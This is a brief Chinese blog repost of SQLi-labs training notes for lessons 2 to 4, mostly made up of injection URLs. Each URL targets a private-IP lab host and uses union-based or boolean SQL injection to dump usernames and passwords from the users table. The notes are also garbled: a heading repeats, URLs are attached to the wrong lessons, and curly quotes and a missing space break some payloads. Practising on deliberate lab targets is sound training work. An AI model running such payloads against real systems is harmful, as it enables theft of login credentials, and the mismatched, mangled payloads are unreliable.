sqllab less 2- less 4
Posted vennus
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqllab less 2- less 4相关的知识,希望对你有一定的参考价值。
less 2 跟less 1区别: 去掉单引号查询表的用户名与密码
http://10.9.2.81/Less-2/?id=-1 union select2,3,group_concat(username,‘:‘,password) from security.users --+
less 3 跟less 1 区别: 加上)将SQL 语句闭合
http://10.9.2.81/Less-3/?id=1 ‘)or ‘1‘=‘1‘ --+
less 3 跟less 1 区别: 加上)将SQL 语句闭合
http://10.9.2.81/Less-4/?id=-1%22)%20union%20select%201,2,group_concat(username,%27:%27,password)%20from%20security.users%20--+
less 4 跟less 3 区别 ‘ 变成 ”
http://10.9.2.81/Less-3/?id=-1’)union select2,3,group_concat(username,‘:‘,password) from security.users--+
以上是关于sqllab less 2- less 4的主要内容,如果未能解决你的问题,请参考以下文章
leetcode_1292. Maximum Side Length of a Square with Sum Less than or Equal to Threshold_[二维前缀和](代码片段